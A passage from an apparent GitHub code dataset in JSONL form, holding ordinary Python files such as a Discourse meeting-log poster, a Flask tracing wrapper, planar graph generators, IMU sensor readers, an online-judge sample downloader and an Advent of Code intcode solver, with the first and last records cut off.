config[\"discourse_user\"]\n api_key = config[\"discourse_key\"]\n url = config[\"discourse_url\"] + \"/posts\"\n\n headers = {\"Api-Key\": api_key, \"Api-Username\": api_user}\n payload = {\"title\": title, \"raw\": raw_post, \"category\": config[\"category_id\"]}\n\n res = requests.post(url, headers=headers, data=payload) # noqa: S113\n r = json.loads(res.content)\n logger.info(f\"Discourse POST: {res.status_code}\")\n if res.status_code == 200:\n r = json.loads(res.content)\n return r[\"topic_id\"]\n else:\n return \"\"\n\n\n# required backend methods\nasync def startmeeting(meetbot, event, meeting):\n room_alias = await get_room_alias(meetbot.client, event.room_id)\n room_name = await get_room_name(meetbot.client, event.room_id)\n\n meetbot.log.info(f\"Ansible: Meeting started in {room_name} ({room_alias} / {event.room_id})\")\n meetbot.log.info(f'Will post to Discourse as {config(meetbot)[\"discourse_user\"]}')\n\n\nasync def endmeeting(meetbot, event, meeting):\n room_alias = await get_room_alias(meetbot.client, event.room_id)\n room_name = await get_room_name(meetbot.client, event.room_id)\n items = await meetbot.get_items(meeting[\"meeting_id\"])\n people_present = await meetbot.get_people_present(meeting[\"meeting_id\"])\n\n meetbot.log.info(f\"Ansible: Meeting ended in {room_name} ({room_alias} / {event.room_id})\")\n\n if len(items) == 0:\n meetbot.log.info(\"No entries\")\n await event.respond(\"No logs to post to Discourse\")\n return ()\n\n # Upload full_log to Discourse\n log_path = await upload_log_to_discourse(\n config(meetbot), render(meetbot, \"text_log.j2\", items=items), meetbot.log\n )\n meetbot.log.info(f\"Discourse Log URL: {log_path}\")\n\n minutes = (\n render(\n meetbot,\n \"html_minutes.j2\",\n items=items,\n name=meeting[\"meeting_name\"],\n room=room_name,\n alias=room_alias,\n people_present=people_present,\n logs=log_path,\n ),\n )\n meetbot.log.info(f\"Discourse Log URL: {minutes}\")\n title = f\"Meeting Log | {room_name} | { time_from_timestamp(int(items[0]['timestamp'])) }\"\n\n pid = await post_to_discourse(config(meetbot), minutes, title, meetbot.log)\n if pid != \"\":\n url = config(meetbot)[\"discourse_url\"] + \"/t/\" + str(pid)\n await event.respond(f\"Logs [posted to Discourse]({url})\")\n","repo_name":"GregSutcliffe/maubot-meetings","sub_path":"meetings/backends/ansible/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4767,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"26594277099","text":"import os\nimport json\nfrom pprint import pprint\n\nberks_package_folder=\"/Users/agautam/work/git/chef/hs_hsconfig/tmp/cookbooks\"\n\nfor cookbook in os.listdir(berks_package_folder):\n metadata_json_file = os.path.join(berks_package_folder, cookbook, \"metadata.json\")\n # print(\"Checking: \" + metadata_json_file)\n if os.path.isfile(metadata_json_file):\n with open(metadata_json_file) as data_file:\n metadata = json.load(data_file)\n # pprint(metadata)\n if cookbook != metadata.get(\"name\"):\n print(\"========= Name does not match for cookbook \" + cookbook)\n print(\"{} {}\".format(metadata.get(\"name\"), metadata.get(\"version\")))\n\n# for dirName, subdirList, fileList in os.walk(berks_package_folder):\n# print('Found directory: %s' % dirName)\n# for fname in fileList:\n# print('\\t%s' % fname)\n# if \"metadata.\"","repo_name":"ajaygautam/PythonScraps","sub_path":"python_scraps/print_chef_dependencies.py","file_name":"print_chef_dependencies.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25754593509","text":"import logging\nimport traceback\nfrom functools import wraps\n\nfrom thundra import constants\nfrom thundra.application.global_application_info_provider import GlobalApplicationInfoProvider\nfrom thundra.config import config_names\nfrom thundra.config.config_provider import ConfigProvider\nfrom thundra.context.execution_context_manager import ExecutionContextManager\nfrom thundra.context.plugin_context import PluginContext\nfrom thundra.context.tracing_execution_context_provider import TracingExecutionContextProvider\nfrom thundra.wrappers import wrapper_utils, web_wrapper_utils\nfrom thundra.wrappers.base_wrapper import BaseWrapper\nfrom thundra.wrappers.flask import flask_executor\n\ntry:\n from flask import request, g\nexcept ImportError:\n request = None\n g = None\n\nlogger = logging.getLogger(__name__)\n\n\nclass FlaskWrapper(BaseWrapper):\n\n def __init__(self, api_key=None, disable_trace=False, disable_metric=True, disable_log=True, opts=None):\n super(FlaskWrapper, self).__init__(api_key, disable_trace, disable_metric, disable_log, opts)\n self.application_info_provider = GlobalApplicationInfoProvider()\n ExecutionContextManager.set_provider(TracingExecutionContextProvider())\n self.plugin_context = PluginContext(application_info=self.application_info_provider.get_application_info(),\n request_count=0,\n executor=flask_executor,\n api_key=self.api_key)\n\n self.plugins = wrapper_utils.initialize_plugins(self.plugin_context, disable_trace, disable_metric, disable_log,\n config=self.config)\n\n web_wrapper_utils.update_application_info(self.application_info_provider, self.plugin_context.application_info,\n constants.ClassNames['FLASK'])\n\n def before_request(self, _request):\n # Execution context initialization\n execution_context = wrapper_utils.create_execution_context()\n execution_context.platform_data['request'] = _request\n\n # Execute plugin hooks before running user's handler\n self.plugin_context.request_count += 1\n self.execute_hook('before:invocation', execution_context)\n\n if g is not None:\n g.thundra_execution_context = execution_context\n\n return execution_context\n\n def after_request(self, response):\n try:\n if g is not None and hasattr(g, 'thundra_execution_context'):\n execution_context = g.thundra_execution_context\n if response:\n execution_context.response = response\n except Exception as e:\n logger.error('Error setting response to context for Thundra: {}'.format(e))\n return response\n\n def teardown_request(self, exception=None):\n try:\n if g is not None and hasattr(g, 'thundra_execution_context'):\n execution_context = g.thundra_execution_context\n if exception:\n execution_context.error = exception\n self.prepare_and_send_reports_async(execution_context)\n except Exception as e:\n logger.error('Error during the request teardown of Thundra: {}'.format(e))\n\n def __call__(self, original_func):\n if hasattr(original_func, \"_thundra_wrapped\") or ConfigProvider.get(config_names.THUNDRA_DISABLE, False):\n return original_func\n\n @wraps(original_func)\n def wrapper(*args, **kwargs):\n if request is None or getattr(request, '_thundra_wrapped', False):\n return original_func(*args, **kwargs)\n setattr(request, '_thundra_wrapped', True)\n try:\n execution_context = self.before_request(request)\n except Exception as e:\n logger.error('Error during the before part of Thundra: {}'.format(e))\n return original_func(*args, **kwargs)\n\n response = None\n # Invoke user handler\n try:\n response = original_func(*args, **kwargs)\n execution_context.response = response\n except Exception as e:\n try:\n error = {\n 'type': type(e).__name__,\n 'message': str(e),\n 'traceback': traceback.format_exc()\n }\n self.teardown_request(error)\n except Exception as e_in:\n logger.error(\"Error during the after part of Thundra: {}\".format(e_in))\n raise e\n\n try:\n self.teardown_request()\n except Exception as e:\n logger.error(\"Error during the after part of Thundra: {}\".format(e))\n return response\n\n setattr(wrapper, '_thundra_wrapped', True)\n return wrapper\n\n call = __call__\n","repo_name":"thundra-io/thundra-agent-python","sub_path":"thundra/wrappers/flask/flask_wrapper.py","file_name":"flask_wrapper.py","file_ext":"py","file_size_in_byte":4991,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"37"} +{"seq_id":"43500889347","text":"#!/usr/bin/env python3\n\ntry:\n integer_types = (int, long)\n range = xrange\nexcept NameError: # Python 3\n integer_types = (int,)\n\nimport random\nfrom graphtheory.structures.edges import Edge\n\n\nclass PlanarGraphFactory:\n \"\"\"The class for planar graph generators.\"\"\"\n\n def __init__(self, graph_class):\n \"\"\"Get a graph class.\"\"\"\n self.cls = graph_class\n\n def make_cyclic(self, n=3):\n \"\"\"Create a weighted cyclic topological graph.\"\"\"\n if n < 3:\n raise ValueError(\"number of vertices must be greater than 2\")\n graph = self.cls(n, False)\n graph.edge_next = dict()\n graph.edge_prev = dict()\n graph.face2edge = dict()\n graph.edge2face = dict()\n weights = list(range(1, 1 + n)) # different weights\n random.shuffle(weights)\n for node in range(n):\n graph.add_node(node)\n L = [] # list of edges\n for i in range(n):\n edge1 = Edge(i, (i+1) % n, weights.pop())\n graph.add_edge(edge1)\n L.append(edge1)\n graph.edge2face[edge1] = 0\n graph.edge2face[~edge1] = 1\n graph.face2edge[0] = L[0]\n graph.face2edge[1] = ~(L[0])\n for i in range(n):\n # At the node i.\n edge1 = L[i]\n edge2 = L[(i+n-1) % n]\n graph.edge_next[edge1] = ~edge2\n graph.edge_next[~edge2] = edge1\n graph.edge_prev[edge1] = ~edge2\n graph.edge_prev[~edge2] = edge1\n return graph\n\n# 1-------2\n# |\\ /|\n# | \\ / |\n# | \\ / | wheel graph W_7\n# 6---0---3 planar Halin graph\n# | / \\ |\n# | / \\ |\n# |/ \\|\n# 5-------4\n\n def make_wheel(self, n=4):\n \"\"\"Create a weighted wheel topological graph.\"\"\"\n if n < 4:\n raise ValueError(\"number of vertices must be greater than 3\")\n graph = self.cls(n, False)\n graph.edge_next = dict()\n graph.edge_prev = dict()\n graph.face2edge = dict()\n graph.edge2face = dict()\n weights = list(range(1, 1 + 2 * n - 2))\n random.shuffle(weights)\n for node in range(n):\n graph.add_node(node)\n hub = 0\n # L[0] and M[0] are empty for convenience.\n L = [None] # list of edges, to the center\n M = [None] # list of edges, circle\n for i in range(1, n):\n edge1 = Edge(i, hub, weights.pop())\n edge3 = Edge(i, i+1 if (i < n-1) else 1, weights.pop())\n graph.add_edge(edge1)\n graph.add_edge(edge3)\n L.append(edge1)\n M.append(edge3)\n for i in range(1, n):\n edge1 = L[i]\n edge2 = L[i+1 if (i < n-1) else 1]\n edge3 = M[i]\n edge4 = M[i-1 if i > 1 else n-1]\n # At the hub.\n graph.edge_next[~edge2] = ~edge1\n graph.edge_prev[~edge1] = ~edge2\n # At the node i.\n graph.edge_next[edge1] = edge3\n graph.edge_next[edge3] = ~edge4\n graph.edge_next[~edge4] = edge1\n graph.edge_prev[edge1] = ~edge4\n graph.edge_prev[~edge4] = edge3\n graph.edge_prev[edge3] = edge1\n # Faces at hub [~edge1, edge3, edge2]\n graph.edge2face[~edge1] = i\n graph.edge2face[edge3] = i\n graph.edge2face[edge2] = i\n graph.edge2face[~edge3] = 0\n graph.face2edge[0] = ~edge3\n graph.face2edge[i] = edge3\n return graph\n\n# EOF\n","repo_name":"ufkapano/graphtheory","sub_path":"graphtheory/planarity/planarfactory.py","file_name":"planarfactory.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"37"} +{"seq_id":"3675501153","text":"#\nimport board # pip3 install adafruit-blinka\nimport adafruit_bno055 # pip3 install adafruit-circuitpython-bno055 (NOT adafruit-bno055)\nimport datetime\nimport uuid\n\n#\nfrom DataClass_BNO055.Base import Base\nfrom DataClass_BNO055.Quaternion import Quaternion\nfrom DataClass_BNO055.Temperature import Temperature\nfrom DataClass_BNO055.Vector3 import Vector3\n\n#\ni2c = board.I2C()\nsensor = adafruit_bno055.BNO055_I2C(i2c, address=0x29)\n\n# Configuration\n\n# Turn on external clock crystal\nsensor._write_register(0x3F, 0x01)\n# Read from register to check if external crystal is enabled\nexternal_crystal_enabled = sensor._read_register(0x3F)\nprint(\"external crystal: \", bool(external_crystal_enabled & 0x01))\n\n\n# Acceleration\ndef getAccelerometerDataBase(sensor: adafruit_bno055.BNO055_I2C) -> Vector3:\n \n accel = sensor.acceleration\n\n return Vector3(\n x = accel[0],\n y = accel[1],\n z = accel[2]\n )\n\ndef getAccelerometerData(sensor: adafruit_bno055.BNO055_I2C, session_id: uuid.UUID, datetime: datetime) -> Base:\n \n return Base(\n session_id = str(session_id),\n timestamp = str(datetime.datetime.now()),\n data = getAccelerometerDataBase(sensor).__dict__\n )\n\n# Gyroscope\ndef getGyroscopeDataBase(sensor: adafruit_bno055.BNO055_I2C) -> Vector3:\n \n gyro = sensor.gyro\n\n return Vector3(\n x = gyro[0],\n y = gyro[1],\n z = gyro[2]\n )\n\ndef getGyroscopeData(sensor: adafruit_bno055.BNO055_I2C, session_id: uuid.UUID, datetime: datetime) -> Base:\n \n return Base(\n session_id = str(session_id),\n timestamp = str(datetime.datetime.now()),\n data = getGyroscopeDataBase(sensor).__dict__\n )\n\n# Magnetometer\ndef getMagnetometerDataBase(sensor: adafruit_bno055.BNO055_I2C) -> Vector3:\n \n mag = sensor.magnetic\n\n return Vector3(\n x = mag[0],\n y = mag[1],\n z = mag[2]\n )\n\ndef getMagnetometerData(sensor: adafruit_bno055.BNO055_I2C, session_id: uuid.UUID, datetime: datetime) -> Base:\n \n return Base(\n session_id = str(session_id),\n timestamp = str(datetime.datetime.now()),\n data = getMagnetometerDataBase(sensor).__dict__\n )\n\n# Euler\ndef getEulerDataBase(sensor: adafruit_bno055.BNO055_I2C) -> Vector3:\n \n euler = sensor.euler\n\n return Vector3(\n x = euler[0],\n y = euler[1],\n z = euler[2]\n )\n\ndef getEulerData(sensor: adafruit_bno055.BNO055_I2C, session_id: uuid.UUID, datetime: datetime) -> Base:\n \n return Base(\n session_id = str(session_id),\n timestamp = str(datetime.datetime.now()),\n data = getEulerDataBase(sensor).__dict__\n )\n\n# Quaternion\ndef getQuaternionDataBase(sensor: adafruit_bno055.BNO055_I2C) -> Quaternion:\n \n quat = sensor.quaternion\n\n return Quaternion(\n w = quat[0],\n x = quat[1],\n y = quat[2],\n z = quat[3]\n ) \n\ndef getQuaternionData(sensor: adafruit_bno055.BNO055_I2C, session_id: uuid.UUID, datetime: datetime) -> Base:\n \n return Base(\n session_id = str(session_id),\n timestamp = str(datetime.datetime.now()),\n data = getQuaternionDataBase(sensor).__dict__\n )\n\n# Linear Acceleration\ndef getLinearAccelerationDataBase(sensor: adafruit_bno055.BNO055_I2C) -> Vector3:\n \n linear_accel = sensor.linear_acceleration\n\n return Vector3(\n x = linear_accel[0],\n y = linear_accel[1],\n z = linear_accel[2]\n )\n\ndef getLinearAccelerationData(sensor: adafruit_bno055.BNO055_I2C, session_id: uuid.UUID, datetime: datetime) -> Base:\n \n return Base(\n session_id = str(session_id),\n timestamp = str(datetime.datetime.now()),\n data = getLinearAccelerationDataBase(sensor).__dict__\n ) \n\n# Gravity\ndef getGravityDataBase(sensor: adafruit_bno055.BNO055_I2C) -> Vector3:\n \n gravity = sensor.gravity\n\n return Vector3(\n x = gravity[0],\n y = gravity[1],\n z = gravity[2]\n )\n\ndef getGravityData(sensor: adafruit_bno055.BNO055_I2C, session_id: uuid.UUID, datetime: datetime) -> Base:\n \n return Base(\n session_id = str(session_id),\n timestamp = str(datetime.datetime.now()),\n data = getGravityDataBase(sensor).__dict__\n )\n\n# Temperature\ndef getTemperatureDataBase(sensor: adafruit_bno055.BNO055_I2C) -> Temperature:\n \n temp = sensor.temperature\n\n return Temperature(\n temp = temp\n )\n\ndef getTemperatureData(sensor: adafruit_bno055.BNO055_I2C, session_id: uuid.UUID, datetime: datetime) -> Base:\n\n return Base(\n session_id = str(session_id),\n timestamp = str(datetime.datetime.now()),\n data = getTemperatureDataBase(sensor).__dict__\n ) \n\n#\ndef getPitchRollData(sensor: adafruit_bno055.BNO055_I2C) -> str:\n \n ox, oy, oz = -sensor.euler[0], sensor.euler[1], sensor.euler[2]\n ax, ay, az = sensor.linear_acceleration[0], sensor.linear_acceleration[1], sensor.linear_acceleration[2]\n\n return f\"{oy}, {ox}, {oz}, {ax}, {ay}, {az}\"\n\ndef getMotionControllerData(sensor: adafruit_bno055.BNO055_I2C) -> str:\n \n x, y, z = sensor.euler[0], -sensor.euler[1], sensor.euler[2]\n \n return f\"{x}, {y}, {z}\"","repo_name":"cavemangamesdk/H4","sub_path":"python/motion-controller-project/get_data_BNO055.py","file_name":"get_data_BNO055.py","file_ext":"py","file_size_in_byte":5171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37856868467","text":"# https://www.youtube.com/watch?v=lN5jesocJjk&list=PLQVvvaa0QuDfKTOs3Keq_kaG2P55YRn5v&index=3\n\nimport pandas as pd\nimport quandl\nimport math\n\ndf = quandl.get('WIKI/GOOGL')\ndf = df[['Adj. Open', 'Adj. High', 'Adj. Low', 'Adj. Close', 'Adj. Volume']]\ndf['HL_PCT'] = (df['Adj. High'] - df['Adj. Close']) / df['Adj. Close'] * 100.0\ndf['PCT_change'] = (df['Adj. Close'] - df['Adj. Open']) / df['Adj. Open'] * 100.0\n\ndf = df[['Adj. Close','HL_PCT','PCT_change','Adj. Volume']]\n\nforecast_col = 'Adj. Close'\ndf.fillna(-99999, inplace=True) # Getting rid of NaNs. In ML you do not want to get rid of the column so you can replace it with a value such as -99999\n\nforecast_out = int(math.ceil(0.01*len(df)))\n\ndf['label'] = df[forecast_col].shift(-forecast_out)\n\ndf.dropna(inplace=True)\nprint(df.head())","repo_name":"Jorrd/MLTutorial","sub_path":"Video_3.py","file_name":"Video_3.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19977517229","text":"from gensim.models.phrases import Phraser, Phrases\nfrom tqdm import tqdm\nfrom utils import Corpus\n\nCORPUS_FILE = \"../corpus/corpus_preproc.txt\"\nPHRASES_FILE = \"../data/phrases.txt\"\n\nMODEL_FILE = \"../models/bigram.model\"\nOUT_FILE = \"../corpus/corpus_phrases.txt\"\n\n\ndef load_phrases():\n with open(PHRASES_FILE) as f:\n return [ x.strip() for x in f.readlines() ]\n\n\ndef check_phrase_list(phrase_list, tokens):\n\n for phrase in phrase_list:\n for i in range(len(tokens)):\n if i < len(tokens)-1:\n if phrase.startswith(tokens[i]) and tokens[i+1] in phrase:\n print(phrase)\n tokens[i:i+2] = [ \"\".join(tokens[i:i+2]) ] \n i = i-1\n return tokens\n\n\ndef remove_under(tokens):\n return [ tok.replace(\"_\", \"\") for tok in tokens]\n\n\ndef build_phrase_model():\n\n phrase_list = load_phrases()\n\n phrases = Phrases(Corpus(CORPUS_FILE))\n bigrams = Phraser(phrases)\n\n bigrams.save(MODEL_FILE)\n\n years = Corpus(CORPUS_FILE).get_years()\n authors = Corpus(CORPUS_FILE).get_authors()\n\n with open(OUT_FILE, \"w\") as f:\n for i, line in tqdm(enumerate(bigrams[Corpus(CORPUS_FILE)])):\n\n line = remove_under(line)\n line = check_phrase_list(phrase_list, line)\n\n line = [ authors[i] ] + line\n line = [ years[i] ] + line\n\n f.write(\"{}\\n\".format(\" \".join(remove_under(line))))\n\n\nif __name__ == \"__main__\":\n build_phrase_model()\n \n #phrase_list = load_phrases()\n #print(check_phrase_list(phrase_list, [\"a\", \"b\", \"想ひ\", \"出づる\", \"c\"]))\n \n","repo_name":"missinglinks/japanologentag2018","sub_path":"src/corpus_1_phrase_model.py","file_name":"corpus_1_phrase_model.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26722598166","text":"from typing import List\nfrom lexer.token import Token\nfrom lexer.code_handler import CodeHandler\nfrom lexer.lexer import Lexer, LexicalError\nfrom parser.parser import Parser, SyntacticalError\nimport asyncio\n\n\nasync def main():\n handler = CodeHandler()\n lexer = Lexer()\n source_code = await handler.read_code_file(\"program.xqdl\")\n tokens: List[Token] = []\n\n try:\n tokens = lexer.tokenize(source_code)\n except LexicalError as e:\n print(e)\n return\n\n parser = Parser(tokens)\n try:\n parser.parse()\n except SyntacticalError as e:\n print(e)\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"codeYann/syntax-parsing","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35728973622","text":"# Python Version: 3.x\nimport json\nimport os\nimport pathlib\nfrom typing import *\n\nimport onlinejudge_command.download_history\nimport onlinejudge_command.format_utils as format_utils\nimport onlinejudge_command.logging as log\nimport onlinejudge_command.utils as utils\nimport requests.exceptions\n\nimport onlinejudge.dispatch as dispatch\nfrom onlinejudge.service.yukicoder import YukicoderProblem\nfrom onlinejudge.type import SampleParseError, TestCase\n\nif TYPE_CHECKING:\n import argparse\n\n\ndef convert_sample_to_dict(sample: TestCase) -> Dict[str, str]:\n data = {} # type: Dict[str, str]\n data[\"name\"] = sample.name\n data[\"input\"] = sample.input_data.decode()\n if sample.output_data is not None:\n data[\"output\"] = sample.output_data.decode()\n return data\n\n\ndef download(args: 'argparse.Namespace') -> None:\n # prepare values\n problem = dispatch.problem_from_url(args.url)\n if problem is None:\n raise requests.exceptions.InvalidURL('The contest \"%s\" is not supported' % args.url)\n is_default_format = args.format is None and args.directory is None # must be here since args.directory and args.format are overwritten\n if args.directory is None:\n args.directory = pathlib.Path('test')\n if args.format is None:\n args.format = '%b.%e'\n\n # get samples from the server\n with utils.new_session_with_our_user_agent(path=args.cookie) as sess:\n if args.yukicoder_token and isinstance(problem, YukicoderProblem):\n sess.headers['Authorization'] = 'Bearer {}'.format(args.yukicoder_token)\n if args.system:\n samples = problem.download_system_cases(session=sess)\n else:\n samples = problem.download_sample_cases(session=sess)\n\n if not samples:\n raise SampleParseError(\"Sample not found\")\n\n # append the history for submit subcommand\n if not args.dry_run and is_default_format:\n history = onlinejudge_command.download_history.DownloadHistory()\n if not list(args.directory.glob('*')):\n # reset the history to help users who use only one directory for many problems\n history.remove(directory=pathlib.Path.cwd())\n history.add(problem, directory=pathlib.Path.cwd())\n\n # prepare files to write\n def iterate_files_to_write(sample: TestCase, *, i: int) -> Iterator[Tuple[str, pathlib.Path, bytes]]:\n for ext in ['in', 'out']:\n data = getattr(sample, ext + 'put_data')\n if data is None:\n continue\n name = sample.name\n table = {}\n table['i'] = str(i + 1)\n table['e'] = ext\n table['n'] = name\n table['b'] = os.path.basename(name)\n table['d'] = os.path.dirname(name)\n path = args.directory / format_utils.percentformat(args.format, table) # type: pathlib.Path\n yield ext, path, data\n\n for i, sample in enumerate(samples):\n for _, path, _ in iterate_files_to_write(sample, i=i):\n if path.exists():\n raise FileExistsError('Failed to download since file already exists: ' + str(path))\n\n # write samples to files\n for i, sample in enumerate(samples):\n log.emit('')\n log.info('sample %d', i)\n for ext, path, data in iterate_files_to_write(sample, i=i):\n log.status('%sput: %s', ext, sample.name)\n if not args.silent:\n log.emit(utils.make_pretty_large_file_content(data, limit=40, head=20, tail=10, bold=True))\n if not args.dry_run:\n path.parent.mkdir(parents=True, exist_ok=True)\n with path.open('wb') as fh:\n fh.write(data)\n log.success('saved to: %s', path)\n\n # print json\n if args.json:\n print(json.dumps(list(map(convert_sample_to_dict, samples))))\n","repo_name":"rodrigoieh/oj","sub_path":"onlinejudge_command/subcommand/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":3838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"36561028378","text":"# coding: utf-8\r\ndef delblankline(infile, outfile):\r\n infopen = open(infile, 'r',encoding=\"utf-8\")\r\n outfopen = open(outfile, 'w',encoding=\"utf-8\")\r\n db = infopen.read()\r\n outfopen.write(db.replace(' ','\\n'))\r\n infopen.close()\r\n outfopen.close()\r\n\r\ndelblankline(\"C:\\\\Users\\\\hp\\\\Desktop\\\\1\\\\111.txt\", \"C:\\\\Users\\\\hp\\\\Desktop\\\\1\\\\333.txt\")\r\n\r\n","repo_name":"chuyu-sama/web","sub_path":"space-to-endl.py","file_name":"space-to-endl.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25616755306","text":"import numpy as np\nfrom p3iv_modules.interfaces.planning import PlannerInterface\nfrom p3iv_types.motion import MotionPlan, MotionPlans\nfrom p3iv_utils.coordinate_transformation import CoordinateTransform\nfrom p3iv_utils.vehicle_models import get_control_inputs\n\n\nclass Planner(PlannerInterface):\n def __init__(self, ego_id, ego_width, ego_length, configurations, *args, **kwargs):\n super(Planner, self).__init__(ego_id, ego_width, ego_length, configurations, *args, **kwargs)\n self._id = ego_id\n self._width = ego_width\n self._length = ego_length\n self.dt = configurations[\"temporal\"][\"dt\"] / 1000.0\n self.n = configurations[\"temporal\"][\"N\"]\n self.timestamp = 0\n\n # store intermediate stuff for convenience\n self._coordinate_transform = None\n self._state = None\n self._progress = None\n\n def __call__(self, timestamp, state, scene_model, situation_model, decision_base, *args, **kwargs):\n PlannerInterface.type_check(timestamp, state, scene_model, situation_model, decision_base, *args, **kwargs)\n self.setCurrentTimestamp(timestamp)\n self.setDrivingCorridor(decision_base.corridor)\n\n foo = 0.0\n self.setMotionState(state, foo)\n mp = self.solve()\n\n mps = MotionPlans()\n mps.append(mp)\n return mps\n\n def setCurrentTimestamp(self, timestamp):\n assert isinstance(timestamp, int)\n self.timestamp = timestamp\n\n def setDrivingCorridor(self, corridor):\n self._corridor_centerline = corridor.center\n self._coordinate_transform = CoordinateTransform(self._corridor_centerline)\n\n def setMotionState(self, state, progress):\n self._state = state\n self._progress = progress\n\n def solve(self, *args, **kwargs):\n current_pos = self._progress\n profile = np.array([])\n for i in range(self.n):\n new_pos = current_pos + self._state.speed * self.dt\n profile = np.append(profile, new_pos)\n current_pos = new_pos\n frenet_l = np.append(self._progress, profile)\n\n xy = self._coordinate_transform.expand(self._state.position.mean, frenet_l, ignore_lateral_offset=True)\n mp = MotionPlan()\n mp.states(xy, dt=self.dt)\n\n mp.controls.acceleration = np.zeros(self.n + 1)\n wheelbase = 0.7 * self._length\n mp.controls.steering = get_control_inputs(mp.states.yaw.mean, mp.states.speed, wheelbase, self.dt)[:, 0]\n\n PlannerInterface.overwrite_with_current_state(mp, self._state)\n\n assert len(mp.states) == self.n + 1 # 1-> current state\n return mp\n","repo_name":"fzi-forschungszentrum-informatik/P3IV","sub_path":"p3iv_modules/src/p3iv_modules/planner/constant_velocity.py","file_name":"constant_velocity.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"6590565446","text":"lines = [l.strip() for l in open('input') if l]\nvalues = [int(value) for value in lines[0].split(',')]\n\n\ndef compute(input_values):\n input = list(values)\n index = 0\n relative_mode_index = 0\n\n while True:\n command_def = input[index]\n command = command_def % 100\n\n def get_address(offset):\n mode = (command_def // (10 * 10**offset)) % 10\n\n if mode == 0:\n return input[index + offset]\n elif mode == 1:\n return index + offset\n elif mode == 2:\n return input[index + offset] + relative_mode_index\n\n assert False == mode\n\n def get(offset):\n address = get_address(offset)\n\n if address < 0:\n raise IndexError()\n return input[address % len(input)]\n\n def set(offset, value):\n address = get_address(offset)\n if address < 0:\n raise IndexError()\n if address >= len(input):\n input.extend([0] * (address - len(input) + 1))\n\n input[address] = value\n\n\n if command == 1:\n a = get(1)\n b = get(2)\n set(3, a + b)\n index += 4\n elif command == 2:\n a = get(1)\n b = get(2)\n\n set(3, a * b)\n index += 4\n elif command == 3:\n set(1, input_values.pop(0))\n index += 2\n elif command == 4:\n next_input = yield get(1)\n if next_input is not None:\n input_values.append(next_input)\n index += 2\n elif command == 5:\n a = get(1)\n b = get(2)\n\n if a != 0:\n index = b\n else:\n index += 3\n elif command == 6:\n a = get(1)\n b = get(2)\n\n if a == 0:\n index = b\n else:\n index += 3\n elif command == 7:\n a = get(1)\n b = get(2)\n set(3, 1 if a < b else 0)\n index += 4\n elif command == 8:\n a = get(1)\n b = get(2)\n set(3, 1 if a == b else 0)\n index += 4\n elif command == 9:\n a = get(1)\n relative_mode_index += a\n index += 2\n elif command == 99:\n return\n\n\ndef paint(initial_colour):\n x = y = 0\n direction_x = 0\n direction_y = 1\n\n colours = {}\n\n r = compute([initial_colour])\n new_colour = next(r)\n\n try:\n while(True):\n turn = next(r)\n\n colours[(x ,y)] = new_colour\n\n direction_x, direction_y = direction_y, direction_x\n if turn == 0 and direction_x:\n direction_x *= -1\n elif turn ==1 and direction_y:\n direction_y *= -1\n\n x += direction_x\n y += direction_y\n\n colour = colours.get((x, y), initial_colour)\n new_colour = r.send(colour)\n except StopIteration:\n pass\n\n return colours\n\n\ndef part1():\n return paint(0)\n\ndef part2():\n colours = paint(1)\n\n min_x = min([c[0] for c in colours])\n max_x = max([c[0] for c in colours])\n min_y = min([c[1] for c in colours])\n max_y = max([c[1] for c in colours])\n\n for y in range(max_y, min_y - 1, -1):\n line = ''\n for x in range(min_x, max_x + 1):\n colour = colours.get((x,y), 0)\n line += ' ' if not colour else '#'\n print(line)\n\nprint('Part 1: ')\nprint(len(part1()))\nprint('Part 2: ')\npart2()\n","repo_name":"victorkirov/aoc","sub_path":"2019/11/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37687713194","text":"import numpy as np\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split\nimport random\nfrom scipy import ndimage\n\n@tf.function\ndef rotate(volume):\n \"\"\"Rotate the volume by a few degrees\"\"\"\n\n def scipy_rotate(volume):\n # define some rotation angles\n angles = [-20, -10, -5, 5, 10, 20]\n # pick angles at random\n angle = random.choice(angles)\n # rotate volume\n volume = ndimage.rotate(volume, angle, reshape=False)\n volume[volume < 0] = 0\n volume[volume > 1] = 1\n return volume\n\n augmented_volume = tf.numpy_function(scipy_rotate, [volume], tf.float32)\n return augmented_volume\n\n\ndef train_preprocessing(volume, label):\n \"\"\"Process training data by rotating and adding a channel.\"\"\"\n # Rotate volume\n volume = rotate(volume)\n volume = tf.expand_dims(volume, axis=3)\n return volume, label\n\n\ndef validation_preprocessing(volume, label):\n \"\"\"Process validation data by only adding a channel.\"\"\"\n volume = tf.expand_dims(volume, axis=3)\n return volume, label\n\ndef get_data():\n input_data_list = np.load('data_list.npy', allow_pickle=True)\n label_data = np.load('label_list.npy', allow_pickle=True)\n print(input_data_list.shape)\n\n x_train, x_val, y_train, y_val = train_test_split(input_data_list, label_data, test_size=0.2, random_state=42)\n a = np.concatenate((x_train, 